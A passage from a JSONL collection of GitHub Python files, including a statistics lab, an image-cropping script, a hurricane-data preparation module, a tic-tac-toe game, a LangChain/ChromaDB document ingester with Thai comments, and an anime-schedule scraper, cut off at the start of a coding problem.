bottomof95 = []\n topof99 = []\n bottomof99 = []\n\n for i in range(0, n):\n count = i + 1\n x = NGD[random.sample(range(N), count)]\n mean.append(np.sum(x) / count)\n std = sig / math.sqrt(count)\n topof95.append(mu + 1.96 * std) # append the values\n bottomof95.append(mu - 1.96 * std)\n topof99.append(mu + 2.58 * std)\n bottomof99.append(mu - 2.58 * std)\n\n list = [x for x in range(1, count + 1)] # making new list with range from 1 to count + 1\n\n fig1 = plt.figure(1)\n plt.scatter(list, mean, c='Blue', marker='x')\n plt.plot(list, topof95, 'r--')\n plt.plot(list, bottomof95, 'r--')\n plt.title('Sample Means and 95% confidence Intervals')\n plt.xlabel('Sample Size')\n plt.ylabel('x_bar')\n\n fig2 = plt.figure(2)\n plt.scatter(list, mean, c='Blue', marker='x')\n plt.plot(list, topof99, 'g--')\n plt.plot(list, bottomof99, 'g--')\n plt.title('Sample Means and 99% confidence Intervals')\n plt.xlabel('Sample Size')\n plt.ylabel('x_bar')\n\n plt.show()\n\n\nN = 1500000\nmu = 55\nsig = 5\nn = 200\nSSonConIntervals(N, mu, sig, n)\n","repo_name":"AshurMotlagh/EE-381","sub_path":"Lab 5/L5Num1.py","file_name":"L5Num1.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14025008360","text":"# USAGE\n# python /home/nmorales/cxgn/DroneImageScripts/ImageCropping/CropToChunks.py --inputfile_path /export/archive/mystitchedimage.png --output_path /export/mychoppedimages/ --width 2000 --height 1000\n\n# import the necessary packages\nimport argparse\nimport imutils\nimport cv2\nimport numpy as np\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--inputfile_path\", required=True, help=\"complete file path to the image you want to cut into chunks\")\nap.add_argument(\"-o\", \"--output_path\", required=True, help=\"file path directory where the cut images will be saved\")\nap.add_argument(\"-x\", \"--width\", required=True, help=\"the width of the output image chunks in px\")\nap.add_argument(\"-y\", \"--height\", required=True, help=\"the height of the output image chunks in px\")\nargs = vars(ap.parse_args())\n\ninputfile_path = args[\"inputfile_path\"]\noutput_path = args[\"output_path\"]\nwidth = int(args[\"width\"])\nheight = int(args[\"height\"])\n\ninput_image = cv2.imread(inputfile_path, cv2.IMREAD_COLOR)\ninput_image_size = input_image.shape\nprint(input_image_size)\ninput_image_height = input_image_size[0]\ninput_image_width = input_image_size[1]\n\ncurrent_width = 0\ncurrent_height = 0\nwidth_overlap = 500\nheight_overlap = 500\n\ncrops = []\nfor col in range(0, input_image_width, width-width_overlap):\n for row in range(0, input_image_height, height-height_overlap):\n cropped = input_image[col:col+width, row:row+height]\n if (cropped.shape[0] != 0 and cropped.shape[1] != 0):\n crops.append(cropped)\n\ncount = 1\nfor i in crops:\n # cv2.imshow(\"Result\", i)\n # cv2.waitKey(0)\n cv2.imwrite(output_path+'image'+str(count)+'.png', i)\n count += 1\n","repo_name":"solgenomics/DroneImageScripts","sub_path":"ImageCropping/CropToChunks.py","file_name":"CropToChunks.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"20375517250","text":"\"\"\"Build the split and scaled training and validation hurricane data arrays.\r\n\r\nFunctions\r\n---------\r\nbuild_hurricane_data(data_path, settings, verbose=0)\r\n\r\n\"\"\"\r\nimport pprint\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport copy\r\n\r\nimport toolbox\r\n\r\n\r\n__author__ = \"Elizabeth A. Barnes and Randal J Barnes\"\r\n__version__ = \"18 March 2022\"\r\n\r\n\r\ndef build_hurricane_data(data_path, settings, verbose=0):\r\n \"\"\"Build the training and validation tensors.\r\n\r\n The settings['target'] specifies which data set to build.There are five\r\n different possible targets: intensity, logitude, latitude, radial, and\r\n angle.\r\n\r\n Arguments\r\n ---------\r\n data_path : str\r\n The input filepath, not including the file name.\r\n\r\n settings : dict\r\n The parameters defining the current experiment.\r\n\r\n verbose : int\r\n 0 -> silent\r\n 1 -> description only\r\n 2 -> description and y statistics\r\n\r\n Returns\r\n -------\r\n x_train : numpy.ndarray\r\n The training split of the x data.\r\n shape = [n_train, n_features].\r\n\r\n onehot_train : numpy.ndarray\r\n The training split of the scaled y data is in the first column.\r\n The remaining columns are filled with zeros. The number of columns\r\n equal the number of distribution parameters.\r\n shape = [n_train, n_parameters].\r\n\r\n x_val : numpy.ndarray\r\n The validation split of the x data.\r\n shape = [n_val, n_features].\r\n\r\n onehot_val : numpy.ndarray\r\n The validation split of the scaled y data is in the first column.\r\n The remaining columns are filled with zeros. The number of columns\r\n equal the number of distribution parameters.\r\n shape = [n_val, n_parameters].\r\n\r\n data_summary : dict\r\n A descriptive dictionary of the data.\r\n\r\n df_val : pandas dataframe\r\n A pandas dataframe containing validation records. The dataframe\r\n contains all columns from the original file.\r\n However, the dataframe contains only rows from the validation data\r\n set that satisfy the specified basin and leadtime requirements, and\r\n were not eliminated due to missing values.\r\n\r\n The dataframe has the shuffled order of the rows. In particular,\r\n the rows of df_val align with the rows of x_val and onehot_val.\r\n\r\n Notes\r\n -----\r\n * No scaling or normalization is applied during data preparation.\r\n\r\n \"\"\"\r\n # Setup for the selected target.\r\n if settings[\"target\"] == \"intensity\":\r\n x_names = [\r\n \"NCI\",\"VMAX0\",\r\n \"DSDV\", \"LGDV\", \"HWDV\", \"AVDV\",\r\n \"VMXC\", \"DV12\", \"SLAT\", \"SSTN\", \"SHDC\", \"DTL\",\r\n ]\r\n y_name = [\"OBDV\"]\r\n missing = None\r\n\r\n elif settings[\"target\"] == \"longitude\":\r\n # x_names = [\"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\", \"LONC\"]\r\n x_names = [\r\n \"NCT\",\r\n \"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n ]\r\n y_name = [\"OBDX\"]\r\n missing = -9999\r\n\r\n elif settings[\"target\"] == \"latitude\":\r\n # x_names = [\"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\", \"LATC\"]\r\n x_names = [\r\n \"NCT\", \"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n ]\r\n y_name = [\"OBDY\"]\r\n missing = -9999\r\n\r\n elif settings[\"target\"] == \"radial\":\r\n x_names = [\r\n \"NCT\",\r\n \"AVDX\", \"EMDX\", \"EGDX\", \"HWDX\",\r\n \"AVDY\", \"EMDY\", \"EGDY\", \"HWDY\",\r\n \"LONC\", \"LATC\",\r\n \"VMXC\", \"DV12\", \"SHDC\", \"SSTN\", \"DTL\",\r\n \"DSDV\", \"LGDV\", \"HWDV\", \"AVDV\",\r\n ]\r\n y_name = [\"OBDR\"]\r\n missing = -9999\r\n\r\n else:\r\n raise NotImplementedError\r\n\r\n # Get the data from the specified file and filter out the unwanted rows.\r\n datafile_path = data_path + settings[\"filename\"]\r\n df_raw = pd.read_table(datafile_path, sep=\"\\s+\")\r\n df_raw = df_raw.rename(columns={'Date': 'year'}) \r\n\r\n df = df_raw[\r\n (df_raw[\"ATCF\"].str.contains(settings[\"basin\"])) &\r\n (df_raw[\"ftime(hr)\"] == settings[\"leadtime\"])\r\n ]\r\n\r\n if missing is not None:\r\n df = df.drop(df.index[df[y_name[0]] == missing])\r\n\r\n # Shuffle the rows in the df Dataframe, using the numpy rng.\r\n # rng = np.random.default_rng(settings['rng_seed'])\r\n df = df.sample(frac=1,random_state=settings['rng_seed'])\r\n df = df.reset_index(drop=True)\r\n\r\n #======================================================================\r\n # Train/Validation/Test Split\r\n \r\n # Get the testing data\r\n if settings[\"test_condition\"] is None:\r\n pass\r\n elif settings[\"test_condition\"] == \"cluster\":\r\n \r\n from scipy.cluster.vq import kmeans,vq\r\n numclust = 6\r\n \r\n data = np.copy(df[x_names].to_numpy())\r\n data_mean = np.mean(data,axis=0)\r\n data_std = np.std(data,axis=0)\r\n data = (data - data_mean)/data_std\r\n\r\n clusters, dist = kmeans(data, numclust, iter=500, seed=settings[\"rng_seed\"])\r\n cluster_label, _ = vq(data,clusters)\r\n class_freq = np.bincount(cluster_label)\r\n cluster_out = np.argmin(class_freq)\r\n\r\n index = np.where(cluster_label == cluster_out)[0]\r\n df_test = df.iloc[index]\r\n x_test = df_test[x_names].to_numpy()\r\n y_test = np.squeeze(df_test[y_name].to_numpy())\r\n df_test = df_test.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n if verbose != 0:\r\n fig, axs = plt.subplots(1,2, figsize=(15,5))\r\n plt.sca(axs[0])\r\n plt.hist(cluster_label,np.arange(-.5,numclust+.5,1.), width=.98)\r\n plt.title('Sample Count by Cluster')\r\n plt.ylabel('number of samples')\r\n plt.xlabel('cluster')\r\n plt.xticks((0,1,2,3))\r\n plt.sca(axs[1])\r\n for ic in np.arange(0,numclust):\r\n plt.plot(x_names,clusters[ic,:], label='cluster ' + str(ic),linewidth=2)\r\n plt.legend()\r\n plt.title('Cluster Centroid')\r\n plt.ylabel('standardized units')\r\n plt.xlabel('predictor')\r\n plt.show() \r\n else:\r\n years = settings[\"years_test\"]\r\n if verbose != 0:\r\n print('years' + str(years) + ' withheld for testing')\r\n index = df.index[df['year'].isin(years)] \r\n df_test = df.iloc[index]\r\n x_test = df_test[x_names].to_numpy()\r\n y_test = np.squeeze(df_test[y_name].to_numpy())\r\n df_test = df_test.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n # get the validation data\r\n if settings[\"val_condition\"] == \"random\":\r\n index = np.arange(0,settings[\"n_val\"])\r\n if(len(index)<100):\r\n raise Warning(\"Are you sure you want n_val < 100?\")\r\n \r\n elif settings[\"val_condition\"] == \"years\":\r\n if verbose != 0:\r\n print('years' + str(settings[\"n_val\"]) + ' withheld for testing')\r\n index = df.index[df['year'].isin(settings[\"n_val\"])] \r\n \r\n # unique_years = df['year'].unique()\r\n # years = unique_years[:settings[\"n_val\"]]\r\n # index = df.index[df['year'].isin(years)] \r\n \r\n df_val = df.iloc[index]\r\n x_val = df_val[x_names].to_numpy()\r\n y_val = np.squeeze(df_val[y_name].to_numpy())\r\n df_val = df_val.reset_index(drop=True)\r\n \r\n df = df.drop(index)\r\n df = df.reset_index(drop=True)\r\n \r\n if settings[\"test_condition\"] is None:\r\n df_test = df_val.copy()\r\n x_test = copy.deepcopy(x_val)\r\n y_test = copy.deepcopy(y_val)\r\n \r\n # Subsample training if desired\r\n if settings[\"n_train\"] == \"max\":\r\n df_train = df.copy()\r\n else:\r\n df_train = df.iloc[:settings[\"n_train\"]]\r\n x_train = df_train[x_names].to_numpy()\r\n y_train = np.squeeze(df_train[y_name].to_numpy())\r\n df_train = df_train.reset_index(drop=True)\r\n \r\n #====================================================================== \r\n # Create 'onehot' y arrays. The y values go in the first column, and the\r\n # remaining columns are zero -- i.e. dummy columns. These dummy columns\r\n # are required by tensorflow; the number of columns must equal the number\r\n # of distribution parameters.\r\n if settings[\"uncertainty_type\"] in (\"bnn\",\"mcdrop\",\"reg\"):\r\n n_parameters = 1\r\n elif \"bnnshash\" in settings[\"uncertainty_type\"]:\r\n n_parameters = 1 \r\n elif \"shash2\" in settings[\"uncertainty_type\"]:\r\n n_parameters = 2\r\n elif \"shash3\" in settings[\"uncertainty_type\"]:\r\n n_parameters = 3\r\n elif \"shash4\" in settings[\"uncertainty_type\"]:\r\n n_parameters = 4\r\n else:\r\n raise NotImplementedError\r\n \r\n \r\n onehot_train = np.zeros((len(y_train), n_parameters))\r\n onehot_val = np.zeros((len(y_val), n_parameters))\r\n onehot_test = np.zeros((len(y_test), n_parameters)) \r\n\r\n onehot_train[:, 0] = y_train\r\n onehot_val[:, 0] = y_val\r\n onehot_test[:, 0] = y_test\r\n\r\n # Make a descriptive dictionary.\r\n data_summary = {\r\n \"datafile_path\": datafile_path,\r\n \"x_train_shape\": tuple(x_train.shape),\r\n \"x_val_shape\": tuple(x_val.shape),\r\n \"x_test_shape\": tuple(x_test.shape), \r\n \"onehot_train_shape\": tuple(onehot_train.shape),\r\n \"onehot_val_shape\": tuple(onehot_val.shape),\r\n \"onehot_test_shape\": tuple(onehot_test.shape), \r\n \"x_names\": x_names,\r\n \"y_name\": y_name,\r\n }\r\n\r\n # Report the results.\r\n if verbose >= 1:\r\n pprint.pprint(data_summary, width=80)\r\n\r\n if verbose >= 2:\r\n toolbox.print_summary_statistics({\"y_train\" : onehot_train[:,0], \r\n \"y_val\" : onehot_val[:,0], \r\n \"y_test\" : onehot_test[:,0]}, \r\n sigfigs=1)\r\n \r\n # change dtype of onehot\r\n onehot_train = onehot_train.astype('float32')\r\n onehot_val = onehot_val.astype('float32') \r\n onehot_test = onehot_test.astype('float32')\r\n \r\n # create valtest set\r\n x_valtest = np.concatenate((x_val, x_test), axis=0)\r\n onehot_valtest = np.concatenate((onehot_val, onehot_test), axis=0)\r\n df_valtest = df_val.append(df_test)\r\n\r\n return (\r\n data_summary, \r\n x_train,\r\n onehot_train,\r\n x_val,\r\n onehot_val,\r\n x_test,\r\n onehot_test, \r\n x_valtest,\r\n onehot_valtest,\r\n df_train,\r\n df_val,\r\n df_test,\r\n df_valtest,\r\n )\r\n","repo_name":"eabarnes1010/hurricane_uqcomparisons","sub_path":"build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":10820,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"31885126027","text":"variant_winner = [\n ['00', '10', '20'], # first vertical\n ['01', '11', '21'], # second vertical\n ['02', '12', '22'], # third vertical\n\n ['00', '01', '02'], # first horizontal\n ['10', '11', '12'], # second horizontal\n ['20', '21', '22'], # third horizontal\n\n ['00', '11', '22'], # left top diagonal\n ['02', '11', '20'], # right top diagonal\n]\n\nuser_choose = {\n 'x': [],\n '0': []\n}\n\n\ntable = [\n # 0 1 2\n ['-', '-', '-'], # 0\n ['-', '-', '-'], # 1\n ['-', '-', '-'], # 2\n]\n\n\ndef print_table(table):\n print(*[' ', 0, 1, 2])\n for index, row in enumerate(table):\n print(index, *row)\n\n\ndef check_winner(user_choose, variant_winner):\n for winner in variant_winner:\n if len([x in winner for x in user_choose]) == 3:\n return True\n return False\n\n\ndef check_user_input(user_input):\n if len(user_input) != 2:\n print('You can input only two numbers')\n return False\n if user_input in user_choose['x'] or user_input in user_choose['0']:\n print('This cell is already taken')\n return False\n if not user_input.isdigit():\n print('You can input only numbers')\n return False\n return True\n\n\nprint_table(table)\n\nplayer = 'x'\ncount_step = 1\nwhile count_step <= 9:\n user = input(f'Enter {player}: ')\n check_input = check_user_input(user)\n if not check_input:\n print('Your coordinates are wrong. Try again...')\n continue\n user_choose[player].append(user)\n\n first = int(user[0])\n second = int(user[1])\n\n table[first][second] = player\n print_table(table)\n\n check = check_winner(user_choose[player], variant_winner)\n if check:\n print('The winner player ', player)\n break\n\n player = '0' if player == 'x' else 'x'\n count_step += 1\n\n\n\n\n\n\n\n","repo_name":"kaitmen/FirstProject","sub_path":"game_X_0.py","file_name":"game_X_0.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25703210269","text":"#!/usr/bin/env python3\nimport os\nimport glob\nfrom typing import List\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\nimport re\n\nfrom langchain.document_loaders import (\n CSVLoader,\n EverNoteLoader,\n PDFMinerLoader,\n TextLoader,\n UnstructuredEmailLoader,\n UnstructuredEPubLoader,\n UnstructuredHTMLLoader,\n UnstructuredMarkdownLoader,\n UnstructuredODTLoader,\n UnstructuredPowerPointLoader,\n UnstructuredWordDocumentLoader\n)\nfrom helper.pdfHelper import customPdfLoader\n\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\n#from langchain.vectorstores import Chroma\n#from langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.docstore.document import Document\nfrom chromadb.api import Collection\n\nfrom constants import (\n #CHROMA_SETTINGS, \n AI_DB_PERSIST_DIR, \n SOURCE_DOCUMENT_PATH, \n #EMBEDDING_INSTANCE,\n AI_DB_STORE_DOCUMENT_SIZE_PER_CHUNK,\n AI_DB_METADATA_INTERNAL_IDX_NAME,\n AI_DB_METADATA_DOCUMENT_SOURCE_NAME,\n get_default_ai_db_collection_name,\n load_chroma_database,\n get_default_embedding,\n transform_special_character_to_encoded\n)\n\n\n# Load environment variables\npersist_directory = AI_DB_PERSIST_DIR\nsource_directory = SOURCE_DOCUMENT_PATH\n#embeddings_model_name = EMBEDDING_MODEL_NAME\nchunk_size = AI_DB_STORE_DOCUMENT_SIZE_PER_CHUNK\nchunk_overlap = 50\n\n\n# Custom document loaders\nclass MyElmLoader(UnstructuredEmailLoader):\n \"\"\"Wrapper to fallback to text/plain when default does not work\"\"\"\n\n def load(self) -> List[Document]:\n \"\"\"Wrapper adding fallback for elm without html\"\"\"\n try:\n try:\n doc = UnstructuredEmailLoader.load(self)\n except ValueError as e:\n if 'text/html content not found in email' in str(e):\n # Try plain text\n self.unstructured_kwargs[\"content_source\"]=\"text/plain\"\n doc = UnstructuredEmailLoader.load(self)\n else:\n raise\n except Exception as e:\n # Add file_path to exception message\n raise type(e)(f\"{self.file_path}: {e}\") from e\n\n return doc\n\n\n# Map file extensions to document loaders and their arguments\nLOADER_MAPPING = {\n \".csv\": (CSVLoader, {}),\n # \".docx\": (Docx2txtLoader, {}),\n \".doc\": (UnstructuredWordDocumentLoader, {}),\n \".docx\": (UnstructuredWordDocumentLoader, {}),\n \".enex\": (EverNoteLoader, {}),\n \".eml\": (MyElmLoader, {}),\n \".epub\": (UnstructuredEPubLoader, {}),\n \".html\": (UnstructuredHTMLLoader, {}),\n \".md\": (UnstructuredMarkdownLoader, {}),\n \".odt\": (UnstructuredODTLoader, {}),\n\n # PDFMinerLoader อ่านข้อมูลไฟล์ pdf ที่เป็น table ไม่ถูกต้อง ซึ่งจะอ่านแนวตั้ง หรือตามคอลัมล์ (ควรอ่านตาม row)\n # มีผลทำให้ข้อมูลที่เก็บไว้ใน ai db เมื่อ Query ขึ้นมาจะได้กลุ่มข้อควาที่เพี้ยน\n # จะได้ Optimize customPdfLoader มาใช้งานโดยอิงกับ Package PyPDF2\n #\".pdf\": (PDFMinerLoader, {}), \n \".pdf\": (customPdfLoader, {}), \n \".ppt\": (UnstructuredPowerPointLoader, {}),\n \".pptx\": (UnstructuredPowerPointLoader, {}),\n \".txt\": (TextLoader, {\"encoding\": \"utf8\"}),\n # Add more mappings for other file extensions and loaders as needed\n}\n\n\ndef load_single_document(file_path: str) -> Document:\n ext = \".\" + file_path.rsplit(\".\", 1)[-1]\n if ext in LOADER_MAPPING:\n loader_class, loader_args = LOADER_MAPPING[ext]\n loader = loader_class(file_path, **loader_args)\n return loader.load()[0]\n\n raise ValueError(f\"Unsupported file extension '{ext}'\")\n\n\ndef load_documents(source_dir: str, ignored_files: List[str] = []) -> List[Document]:\n \"\"\"\n Loads all documents from the source documents directory, ignoring specified files\n \"\"\"\n all_files = []\n for ext in LOADER_MAPPING:\n all_files.extend(\n glob.glob(os.path.join(source_dir, f\"**/*{ext}\"), recursive=True)\n )\n filtered_files = [file_path for file_path in all_files if file_path not in ignored_files]\n\n with Pool(processes=os.cpu_count()) as pool:\n results = []\n with tqdm(total=len(filtered_files), desc='Loading new documents', ncols=80) as pbar:\n for i, doc in enumerate(pool.imap_unordered(load_single_document, filtered_files)):\n results.append(doc)\n pbar.update()\n\n return results\n\ndef process_documents(collection: Collection, ignored_files: List[str] = []) -> List[Document]:\n \"\"\"\n นำเอกสารแต่ละไฟล์ที่โหลดเนื้อหาเสร็จ มาสร้าง เป็น Document\n ทำความสะอาดเนื้อหาจากไฟล์เอกสาร เพื่อให้ลดขนาดพื้นที่ของ AI DB ไม่ต้องเก็บส่วน บรรทัดที่ไม่มีข้อความอยู่\n \n 1. ตัดข้อความออกเป็นส่วนๆ โดยใช้เงื่อนไข \"\\ n|\\ n\\ n|\\ r\\ n\"\n 2. trim พื้นที่ว่างซ้ายขวา และ ใส่ \"\\ n\" ในประโยคที่ลงท้ายด้วย . จะได้ \".\\ n\" เพื่อเป็น Markpoint ให้ LLM หยุดสร้างประโยคคำตอบ\n 3. นำเนื้อความที่ได้จาก ข้อ 2 ไปสร้างเป็นเอกสาร และ เก็บลง ChromaDB (AI DB)\n \"\"\"\n print(f\"Loading documents from {source_directory}\")\n documents = load_documents(source_directory, ignored_files)\n if not documents:\n print(\"No new documents to load\")\n exit(0)\n print(f\"Loaded {len(documents)} new documents from {source_directory}\")\n\n\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)\n\n # นำเอกสารแต่ละไฟล์��ี่โหลดเนื้อหาเสร็จ มาสร้าง เป็น Document\n # ทำความสะอาดเนื้อหาจากไฟล์เอกสาร เพื่อให้ลดขนาดพื้นที่ของ AI DB ไม่ต้องเก็บส่วน บรรทัดที่ไม่มีข้อความอยู่\n #\n # 1. ตัดข้อความออกเป็นส่วนๆ โดยใช้เงื่อนไข \\n|\\n\\n|\\r\\n\n # 2. trim พื้นที่ว่างซ้ายขวา และ ใส่ \\n ในประโยคที่ลงท้ายด้วย . จะได้ .\\n เพื่อเป็น Markpoint ให้ LLM หยุดสร้างประโยคคำตอบ\n # 3. นำเนื้อความที่ได้จาก ข้อ 2 ไปสร้างเป็นเอกสาร และ เก็บลง ChromaDB (AI DB)\n ret_new_document = []\n for doc in documents:\n split_texts = re.split(pattern=\"\\n{1,}|\\r\\n\", string=doc.page_content)\n split_texts = [re.sub('\\s{2,}', ' ', text.strip()) for text in split_texts if len(text.strip()) > 0]\n split_texts = [f'{text}\\n' if text.endswith('.') else text for text in split_texts] # ทำ Markpoint ให้ LLM ทราบถึง End-of-sequence/Stop Sequence/Stop Generate Text/จุดสิ้นสุดของประโยค\n cleaned_texts = ' '.join(split_texts)\n\n # ตัดข้อความแยกออกเป็นแต่ล่ะ Chunk (แยกออกเป็นก้อนๆ)\n # .split_text \\n จะถูกตัดออกไปหาก เป็นคำสุดท้ายของ chunk พอดี\n chunks = text_splitter.split_text(text=cleaned_texts)\n chunks = [f'{chunk}\\n' if chunk.endswith('.') else chunk for chunk in chunks] # Mark point End-Of-Sequence/Stop Sequence/Stop Generate Text ไว้ให้สำหรับ LLM\n id_count = 1\n for chunk in chunks:\n new_idx = f'idx_{id_count}'\n id_count += 1\n\n # จัดการกับ Special Character เพื่อไม่ให้เกิดข้อผิดพลาดในระหว่างการสร้างคำตอบของ LLM เช่น\n # Feature: Deposit cash balance Conditions: Users can’t deposit\n # เมื่อเจอ ’ ในบางครั้งจะเป็นผลทำให้ LLM มี Exception ระหว่างการ Generate คำตอบ\n # ** ยกเลิกออกไปก่อน: ยังหาวิธี decode ข้อความที่ถูก encode กลับมาเป็น original ไม่ได้\n chunk_transform_special_character = chunk #transform_special_character_to_encoded(chunk)\n\n # เก็บข้อมูลในแต่ล่ะ Chunk ลง AI DB\n collection.add(\n ids = [f\"{doc.metadata['source']}-{new_idx}\"],\n documents=[chunk_transform_special_character],\n metadatas=[{AI_DB_METADATA_INTERNAL_IDX_NAME: new_idx, AI_DB_METADATA_DOCUMENT_SOURCE_NAME: doc.metadata['source']}]\n )\n ret_new_document.append(chunk_transform_special_character)\n\n return ret_new_document\n\n # text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)\n # split_documents = text_splitter.split_documents(documents)\n # print(f\"Split into {len(split_documents)} chunks of text (max. {chunk_size} tokens each)\")\n # return split_documents\n\ndef does_vectorstore_exist(persist_directory: str) -> bool:\n \"\"\"\n Checks if vectorstore exists\n \"\"\"\n if os.path.exists(os.path.join(persist_directory, 'index')):\n if os.path.exists(os.path.join(persist_directory, 'chroma-collections.parquet')) and os.path.exists(os.path.join(persist_directory, 'chroma-embeddings.parquet')):\n list_index_files = glob.glob(os.path.join(persist_directory, 'index/*.bin'))\n list_index_files += glob.glob(os.path.join(persist_directory, 'index/*.pkl'))\n # At least 3 documents are needed in a working vectorstore\n if len(list_index_files) > 3:\n return True\n return False\n\ndef main():\n # Create embeddings\n #embeddings = EMBEDDING_INSTANCE #HuggingFaceEmbeddings(model_name=embeddings_model_name)\n #embeddings = HuggingFaceEmbeddings()\n\n # if does_vectorstore_exist(persist_directory):\n # # Update and store locally vectorstore\n # print(f\"Appending to existing vectorstore at {persist_directory}\")\n # db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=CHROMA_SETTINGS)\n # collection = db.get()\n # texts = process_documents([metadata['source'] for metadata in collection['metadatas']])\n # print(f\"Creating embeddings. May take some minutes...\")\n # db.add_documents(texts)\n # else:\n # # Create and store locally vectorstore\n # print(\"Creating new vectorstore\")\n # texts = process_documents()\n # print(f\"Creating embeddings. May take some minutes...\")\n # db = Chroma.from_documents(texts, embeddings, persist_directory=persist_directory, client_settings=CHROMA_SETTINGS)\n\n db = load_chroma_database()\n collection = None if get_default_ai_db_collection_name() not in [coll.name for coll in db.list_collections()] else db.get_collection(name=get_default_ai_db_collection_name(), embedding_function=get_default_embedding())\n if collection == None:\n # สร้าง Vectorstore ใหม่\n # create_collection also takes an optional metadata argument which can be used to customize the distance \n # method of the embedding space by setting the value of hnsw:space. \n # Valid options for hnsw:space are \"l2\", \"ip, \"or \"cosine\"\n print('Creating new vectorstore ...')\n collection = db.create_collection(\n name=get_default_ai_db_collection_name(),\n embedding_function=get_default_embedding(),\n metadata={\"hnsw:space\": \"cosine\"}\n )\n else:\n print(\"Finding document there aren't exists in vectorstore and will update ...\")\n\n # ค้นหารายการเอกสารทั้งหมดที่เก็บใน Collection\n # เพื่อนำข้อมูลใน metadatatas มาตรวจสอบ มีไฟล์ใดบ้างแล้วที่ถูก เก็บไว้\n documents = collection.get()\n process_documents(collection, [metadata['source'] for metadata in documents[\"metadatas\"]])\n db.persist()\n db = None\n\n print(f\"Ingestion complete! You can now run runner.py to query your documents\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"chairod/LLM-GPT4All","sub_path":"ingre.py","file_name":"ingre.py","file_ext":"py","file_size_in_byte":13345,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3826478472","text":"from bokeh.plotting import figure\n\ndef getLocations(df_tws):\n\t# count sentiments from each tweet\n\ttw_pos = sum(df_tws['sentiment'] == 1)\n\ttw_neu = sum(df_tws['sentiment'] == 0)\n\ttw_neg = sum(df_tws['sentiment'] == -1)\n\n\t# plot results\n\tgroup = ['Negative', 'Neutral', 'Positive']\n\tcounts = [tw_neg, tw_neu, tw_pos]\n\tp = figure(plot_height=400, x_range=group, title='Sentiment Analysis', toolbar_location=None, tools='')\n\tp.vbar(x=group, top=counts, width=0.8) # , source=source)\n\tp.y_range.start = 0\n\tp.xgrid.grid_line_color = None\n\tp.xaxis.axis_label = 'Hashtags'\n\tp.xaxis.major_label_orientation = 1.2\n\tp.outline_line_color = None\n\treturn p","repo_name":"timmo-d/MyApps","sub_path":"sentiment/src/analysis_geo.py","file_name":"analysis_geo.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4931003372","text":"from bs4 import BeautifulSoup\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nimport json\n\nSCRAPED_SITE = 'https://subsplease.org'\nMEDIA_FOLDER = 'media/'\nSHOWS_FOLDER = '/shows/'\nJSON_URL = 'https://subsplease.org/api/?f=schedule&tz=Europe/Moscow'\n\ndef get_image(url, save_filename):\n rimg = requests.get(SCRAPED_SITE + url)\n img = Image.open(BytesIO(rimg.content))\n img.save(MEDIA_FOLDER+save_filename+'.jpg')\n return save_filename+'.jpg'\n\ndef get_full_url(page):\n return SCRAPED_SITE + SHOWS_FOLDER + page\n\ndef get_synopsis(page):\n syn = ''\n r = requests.get(get_full_url(page))\n soup = BeautifulSoup(r.text, \"html.parser\")\n syn_list = soup.body.find_all('div', class_=\"series-syn\")[0].find_all('p')\n\n for p in syn_list:\n syn += p.get_text() + '\\n'\n\n return syn.strip()\n\ndef get_schedule():\n animes = json.loads(requests.get(JSON_URL).text)\n\n anime_dictionary = {}\n\n days_list = ['Monday', 'Tuesday', 'Wednesday',\n 'Thursday', 'Friday', 'Saturday', 'Sunday']\n\n for day in days_list:\n anime_day = animes['schedule'][day]\n anime_dictionary[day] = []\n for i in range(len(anime_day)):\n show = anime_day[i]\n anime_dictionary[day].append({\n 'title': show['title'],\n 'time': show['time'],\n 'synopsis': get_synopsis(show['page']),\n 'image': get_image(show['image_url'], show['page']),\n 'url' : get_full_url(show['page'])})\n\n\n with open('anime.json', 'w', encoding='utf-8') as f:\n json.dump(anime_dictionary, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n get_schedule()","repo_name":"pevepeve/catbot","sub_path":"fetch_subsplease.py","file_name":"fetch_subsplease.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27536547486","text":"\"\"\"\nBasic Calculator II\n\nGiven a string s which represents an expression, evaluate this expression and return its value. \n\nThe integer division should truncate toward zero.\n\nYou may assume that the given expression is always valid. All intermediate results will be in the range of [-2^31, 2^31 - 1].\n\nNote: You are not allowed to use any built-in function which 